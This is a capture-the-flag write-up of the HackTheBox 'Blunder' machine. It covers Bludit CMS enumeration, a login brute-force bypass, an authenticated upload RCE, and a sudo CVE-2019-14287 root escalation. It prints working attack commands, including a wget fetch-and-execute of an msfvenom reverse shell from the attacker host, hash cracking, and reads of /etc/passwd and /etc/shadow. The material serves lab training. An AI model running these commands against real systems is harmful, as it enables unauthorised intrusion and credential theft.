writeups

Blunder - Write-up - HackTheBox

noraj (Alexandre ZANNI)
, , , , , , , , , , ,

Information

Box#

Blunder

Write-up

Overview#

Install tools used in this WU on BlackArch Linux:

1
$ pacman -S nmap ffuf exploitdb cewl metasploit ruby-httpclient ruby-docopt pwncat haiti

Network enumeration#

A nmap scan for port and service discovery:

1
2
3
4
5
6
7
8
9
10
11
12
13
# Nmap 7.80 scan initiated Fri Jun 12 13:20:17 2020 as: nmap -sSVC -p- -oA nmap_full 10.10.10.191
Nmap scan report for 10.10.10.191
Host is up (0.11s latency).
Not shown: 65533 filtered ports
PORT   STATE  SERVICE VERSION
21/tcp closed ftp
80/tcp open   http    Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Blunder
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Blunder | A blunder of interesting facts

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jun 12 14:23:47 2020 -- 1 IP address (1 host up) scanned in 3809.57 seconds

Let's add the local domain to /etc/hosts:

1
2
$ cat /etc/hosts| grep bundler
10.10.10.191 bundler.htb

HTTP enumeration & exploitation#

Let's start to enumerate pages on the web server with ffuf:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
$ ffuf -u http://bundler.htb/FUZZ -r -c -w ~/CTF/tools/SecLists/Discovery/Web-Content/raft-small-words-lowercase.txt -e .txt,.html,.php -fc 403

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.2.0-git
________________________________________________

 :: Method           : GET
 :: URL              : http://bundler.htb/FUZZ
 :: Wordlist         : FUZZ: /home/noraj/CTF/tools/SecLists/Discovery/Web-Content/raft-small-words-lowercase.txt
 :: Extensions       : .txt .html .php
 :: Follow redirects : true
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403
 :: Filter           : Response status: 403
________________________________________________

admin                   [Status: 200, Size: 2385, Words: 106, Lines: 71]
install.php             [Status: 200, Size: 30, Words: 5, Lines: 1]
about                   [Status: 200, Size: 3280, Words: 225, Lines: 106]
0                       [Status: 200, Size: 7561, Words: 794, Lines: 171]
robots.txt              [Status: 200, Size: 22, Words: 3, Lines: 2]
todo.txt                [Status: 200, Size: 118, Words: 20, Lines: 5]
rev.php                 [Status: 200, Size: 0, Words: 1, Lines: 1]
usb                     [Status: 200, Size: 3959, Words: 304, Lines: 111]
.gitignore              [Status: 200, Size: 563, Words: 1, Lines: 28]
:: Progress: [153068/153068] :: Job [1/1] :: 105 req/sec :: Duration: [0:24:07] :: Errors: 0 ::

I found the following path and files:

  • /install.php: Bludit is already installed ;)
  • /admin/: login page where Bludit is also mentioned
  • /robots.txt: nothing much
  • /todo.txt: a bunch of hints, see below
  • /.gitignore: there is maybe a /.git/ folder exposed to dump

/todo.txt

1
2
3
4
-Update the CMS
-Turn off FTP - DONE
-Remove old users - DONE
-Inform fergus that the new blog needs images - PENDING

The website seems to be built with Bludit CMS. If we trust the todo list, it may be up to date, the FTP is off and we saw with the nmap scan that port 21 is closed. Also there must be a user called fergus that may be the admin.

It seems the CMS could be exploitable but we don't know the version we have yet.

1
2
3
4
5
6
7
8
9
$ searchsploit Bludit --id
---------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                    |  EDB-ID
---------------------------------------------------------------------------------- ---------------------------------
Bludit 3.9.12 - Directory Traversal                                               | 48568
Bludit - Directory Traversal Image File Upload (Metasploit)                       | 47699
bludit Pages Editor 3.0.0 - Arbitrary File Upload                                 | 46060
---------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

No need to try to bruteforce on the authentication because there is a brute force protection enabled by default.

The current version is 3.13.1, so I looked in the source code on github for this version and tried to see if a file is disclosing it. It seems that some files like bl-plugins/about/metadata.json are leaking the version.

So if we look at http://10.10.10.191/bl-plugins/about/metadata.json we obtain the following response:

1
2
3
4
5
6
7
8
9
10
{
  "author": "Bludit",
  "email": "",
  "website": "https://plugins.bludit.com",
  "version": "3.9.2",
  "releaseDate": "2019-06-21",
  "license": "MIT",
  "compatible": "3.9.2",
  "notes": ""
}

For example the directory traversal was in 3.9.12 so 3.9.2 must be vulnerable too.

So let's try EDB-48568 now:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
$ searchsploit -p 48568
  Exploit: Bludit 3.9.12 - Directory Traversal
      URL: https://www.exploit-db.com/exploits/48568
     Path: /usr/share/exploitdb/exploits/php/webapps/48568.py
File Type: Python script, ASCII text executable, with very long lines, with CRLF line terminators

$ cp /usr/share/exploitdb/exploits/php/webapps/48568.py .

$ python 48568.py


╔╗ ┬  ┬ ┬┌┬┐┬┌┬┐  ╔═╗╦ ╦╔╗╔
╠╩╗│  │ │ │││ │   ╠═╝║║║║║║
╚═╝┴─┘└─┘─┴┘┴ ┴   ╩  ╚╩╝╝╚╝

 CVE-2019-16113 CyberVaca


usage: 48568.py [-h] -u URL -user USER -pass PASSWORD -c COMMAND
48568.py: error: the following arguments are required: -u, -user, -pass, -c

But it seems it's an authenticated exploit. The MSF upload exploit seems to be authenticated too.

So I searched on internet and found some articles talking about bruteforce protection bypass:

With CeWL let's build a wordlist based on the words from the website:

1
$ cewl -w blunder_wordlist.txt -m 5 http://10.10.10.191

Then we can try to find fergus password via bruteforce. I made an exploit for the Brute Force Mitigation Bypass: Bludit-auth-BF-bypass.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
$ ./exploit.rb -r http://10.10.10.191 -u fergus -w blunder_wordlist.txt
[*] Trying password: Plugins
[*] Trying password: Include
[*] Trying password: About
[*] Trying password: Begin
[*] Trying password: service
[*] Trying password: Stadia
[*] Trying password: Dynamic
[*] Trying password: blunder
[*] Trying password: interesting
[*] Trying password: facts
[*] Trying password: devices
[*] Trying password: Google
...
[*] Trying password: RolandDeschain

[+] Password found: RolandDeschain

Now we can log in and will probably be able to use one of the authenticated exploit.

Let's try the msf one:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
msf5 exploit(linux/http/bludit_upload_images_exec) > options

Module options (exploit/linux/http/bludit_upload_images_exec):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   BLUDITPASS  RolandDeschain   yes       The password for Bludit
   BLUDITUSER  fergus           yes       The username for Bludit
   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS      10.10.10.191     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT       80               yes       The target port (TCP)
   SSL         false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI   /                yes       The base path for Bludit
   VHOST                        no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.98     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Bludit v3.9.2

msf5 exploit(linux/http/bludit_upload_images_exec) > run

[*] Started reverse TCP handler on 192.168.1.98:4444
[+] Logged in as: fergus
[*] Retrieving UUID...
[*] Uploading ScDPUYvvNY.png...
[*] Uploading .htaccess...
[*] Executing ScDPUYvvNY.png...
[!] This exploit may require manual cleanup of '.htaccess' on the target
[*] Exploit completed, but no session was created.

But remember we can try the Python PoC, that won't drop a shell directly but we should be able to execute a command:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
$ python 48568.py -u http://10.10.10.191 -user fergus -pass RolandDeschain -c 'wget http://10.10.14.82:8888'


╔╗ ┬  ┬ ┬┌┬┐┬┌┬┐  ╔═╗╦ ╦╔╗╔
╠╩╗│  │ │ │││ │   ╠═╝║║║║║║
╚═╝┴─┘└─┘─┴┘┴ ┴   ╩  ╚╩╝╝╚╝

 CVE-2019-16113 CyberVaca


[+] csrf_token: c70c85766c4e397c88528a05f2096ec4b155ccb7
[+] cookie: dvn3jo5f1srsl0in6snh59k346
[+] csrf_token: 1c97c7eab1fadc24b5ac09a593e150c794a19eb7
[+] Uploading oytpsybc.jpg
[+] Executing command: wget http://10.10.14.82:8888
[+] Delete: .htaccess
[+] Delete: oytpsybc.jpg

We can see the connection on our oneline web server:

1
2
3
4
5
6
$ ruby -run -e httpd . -p 8888
[2020-08-16 20:54:16] INFO  WEBrick 1.6.0
[2020-08-16 20:54:16] INFO  ruby 2.7.1 (2020-03-31) [x86_64-linux]
[2020-08-16 20:54:16] INFO  WEBrick::HTTPServer#start: pid=71953 port=8888
10.10.10.191 - - [16/Aug/2020:20:54:53 CEST] "GET / HTTP/1.1" 200 2265
- -> /

So we can generate a reverse shell with msfvenom (part of msf):

1
2
3
4
$ msfvenom -a x64 --platform linux -p linux/x64/shell_reverse_tcp LHOST=10.10.14.82 LPORT=9999 -f elf > revshell.elf
No encoder specified, outputting raw payload
Payload size: 74 bytes
Final size of elf file: 194 bytes

Start a listener with pwncat:

1
2
3
$ pwncat -l 9999 -vv
INFO: Listening on :::9999 (family 10/IPv6, TCP)
INFO: Listening on 0.0.0.0:9999 (family 2/IPv4, TCP)

Upload & execute our reverse shell:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
$ python 48568.py -u http://10.10.10.191 -user fergus -pass RolandDeschain -c 'wget http://10.10.14.82:8888/revshell.elf && chmod +x revshell.elf && ./revshell.elf'


╔╗ ┬  ┬ ┬┌┬┐┬┌┬┐  ╔═╗╦ ╦╔╗╔
╠╩╗│  │ │ │││ │   ╠═╝║║║║║║
╚═╝┴─┘└─┘─┴┘┴ ┴   ╩  ╚╩╝╝╚╝

 CVE-2019-16113 CyberVaca


[+] csrf_token: 1f60ba2db4a30cade52205468c95b5f33e408bc3
[+] cookie: 3a679ict7buj7aqkmff6e132f3
[+] csrf_token: 6c3f1bf1c0455dfabb3c539367629f6cb21298da
[+] Uploading ggllqvlr.jpg
[+] Executing command: wget http://10.10.14.82:8888/revshell.elf && chmod +x revshell.elf && ./revshell.elf
[+] Delete: .htaccess
[+] Delete: ggllqvlr.jpg

And we obtain a shell:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
INFO: Client connected from 10.10.10.191:53416 (family 2/IPv4, TCP)

which python
/usr/bin/python

python -c 'import pty;pty.spawn("/bin/bash")'

www-data@blunder:/var/www/bludit-3.9.2/bl-content/tmp$ uname -a
Linux blunder 5.3.0-53-generic #47-Ubuntu SMP Thu May 7 12:18:16 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

www-data@blunder:/var/www/bludit-3.9.2/bl-content/tmp$ cat /etc/os-release
NAME="Ubuntu"
VERSION="19.10 (Eoan Ermine)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 19.10"
VERSION_ID="19.10"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=eoan
UBUNTU_CODENAME=eoan

www-data@blunder:/var/www/bludit-3.9.2/bl-content/tmp$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Note: it's possible to do it manually too.

System enumeration#

Let's see if there are accounts used by humans:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
www-data@blunder:/var/www/bludit-3.9.2$ ls -lhA /home
total 8.0K
drwxr-xr-x 16 hugo  hugo  4.0K May 26 09:29 hugo
drwxr-xr-x 16 shaun shaun 4.0K Apr 28 12:13 shaun

www-data@blunder:/var/www/bludit-3.9.2$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:106:113::/run/uuidd:/usr/sbin/nologin
tcpdump:x:107:114::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:108:115:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
usbmux:x:109:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
rtkit:x:110:116:RealtimeKit,,,:/proc:/usr/sbin/nologin
dnsmasq:x:111:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
cups-pk-helper:x:112:119:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
speech-dispatcher:x:113:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
kernoops:x:114:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
avahi:x:115:121:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
saned:x:116:122::/var/lib/saned:/usr/sbin/nologin
nm-openvpn:x:117:123:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin
whoopsie:x:118:124::/nonexistent:/bin/false
colord:x:119:125:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
hplip:x:120:7:HPLIP system user,,,:/var/run/hplip:/bin/false
geoclue:x:121:126::/var/lib/geoclue:/usr/sbin/nologin
pulse:x:122:127:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
gnome-initial-setup:x:123:65534::/run/gnome-initial-setup/:/bin/false
gdm:x:124:129:Gnome Display Manager:/var/lib/gdm3:/bin/false
shaun:x:1000:1000:blunder,,,:/home/shaun:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
hugo:x:1001:1001:Hugo,1337,07,08,09:/home/hugo:/bin/bash
temp:x:1002:1002:,,,:/home/temp:/bin/bash

user.txt is in hugo's home folder and shuan maybe be used for EoP.

Elevation of privilege (EoP): from www-data to hugo#

Let's see in the database of the app:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
$ www-data@blunder:/var/www/bludit-3.9.2$ cat bl-content/databases/users.php
<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{
    "admin": {
        "nickname": "Admin",
        "firstName": "Administrator",
        "lastName": "",
        "role": "admin",
        "password": "bfcc887f62e36ea019e3295aafb8a3885966e265",
        "salt": "5dde2887e7aca",
        "email": "",
        "registered": "2019-11-27 07:40:55",
        "tokenRemember": "",
        "tokenAuth": "b380cb62057e9da47afce66b4615107d",
        "tokenAuthTTL": "2009-03-15 14:00",
        "twitter": "",
        "facebook": "",
        "instagram": "",
        "codepen": "",
        "linkedin": "",
        "github": "",
        "gitlab": ""
    },
    "fergus": {
        "firstName": "",
        "lastName": "",
        "nickname": "",
        "description": "",
        "role": "author",
        "password": "be5e169cdf51bd4c878ae89a0a89de9cc0c9d8c7",
        "salt": "jqxpjfnv",
        "email": "",
        "registered": "2019-11-27 13:26:44",
        "tokenRemember": "",
        "tokenAuth": "0e8011811356c0c5bd2211cba8c50471",
        "tokenAuthTTL": "2009-03-15 14:00",
        "twitter": "",
        "facebook": "",
        "codepen": "",
        "instagram": "",
        "github": "",
        "gitlab": "",
        "linkedin": "",
        "mastodon": ""
    }

The password seems to be stored as a salted SHA1 hash, we can tell with haiti:

1
2
3
4
5
6
7
8
9
10
$ haiti bfcc887f62e36ea019e3295aafb8a3885966e265
SHA-1 [HC: 100] [JtR: raw-sha1]
Double SHA-1 [HC: 4500]
RIPEMD-160 [HC: 6000] [JtR: ripemd-160]
Haval-160
Tiger-160
HAS-160
LinkedIn [HC: 190] [JtR: raw-sha1-linkedin]
Skein-256(160)
Skein-512(160)

Those two users won't help us because admin doesn't have a system account & we already have fergus that doesn't have a system account too.

But look, there is another bludit version:

1
2
www-data@blunder:/var/www$ ls
bludit-3.10.0a  bludit-3.9.2  html

In the other version the user database contains hugo, a user that is on the system, so we have soem chance the account re-use the same password.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ cat users.php
<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{
    "admin": {
        "nickname": "Hugo",
        "firstName": "Hugo",
        "lastName": "",
        "role": "User",
        "password": "faca404fd5c0a31cf1897b823c695c85cffeb98d",
        "email": "",
        "registered": "2019-11-27 07:40:55",
        "tokenRemember": "",
        "tokenAuth": "b380cb62057e9da47afce66b4615107d",
        "tokenAuthTTL": "2009-03-15 14:00",
        "twitter": "",
        "facebook": "",
        "instagram": "",
        "codepen": "",
        "linkedin": "",
        "github": "",
        "gitlab": ""}
}

And this time no salt it used. So let's try the hash on CrackStation.

The password is: Password120.

1
2
3
4
5
6
7
8
www-data@blunder:/var/www$ su hugo
Password:

hugo@blunder:~$ cat user.txt
9b8099236a4c7efcad6bf60293d921e5

hugo@blunder:~$ id
uid=1001(hugo) gid=1001(hugo) groups=1001(hugo)

Elevation of privilege (EoP): from hugo to root#

We can launch a bash shell as any user except root:

1
2
3
4
5
6
7
8
9
hugo@blunder:~$ sudo -l
Password:

Matching Defaults entries for hugo on blunder:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User hugo may run the following commands on blunder:
    (ALL, !root) /bin/bash

But that's in theory, because we can use sudo < 1.8.28 - Security Bypass (CVE-2019-14287), see EDB-47502.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
hugo@blunder:~$ sudo --version
sudo --version
Sudo version 1.8.25p1
Sudoers policy plugin version 1.8.25p1
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.25p1

hugo@blunder:~$ sudo -u#-1 /bin/bash

root@blunder:/home/hugo# id
uid=0(root) gid=1001(hugo) groups=1001(hugo)

root@blunder:/# cat /root/root.txt
df815831c59461a89906cac16c662282

root@blunder:/# cat /etc/shadow | grep root
root:$6$GmdDkez55tk.8Dvd$qDfa.WwHrKSBCswEaWLaSwFNCeNroew0pyxbsg8uO8a2/uq.XelP9Q/u5Cb9cBxO6hSyaVqt1lfU.3omw0ThC0:18228:0:99999:7:::

I wonder if there was a way to root via the shuan account.

Share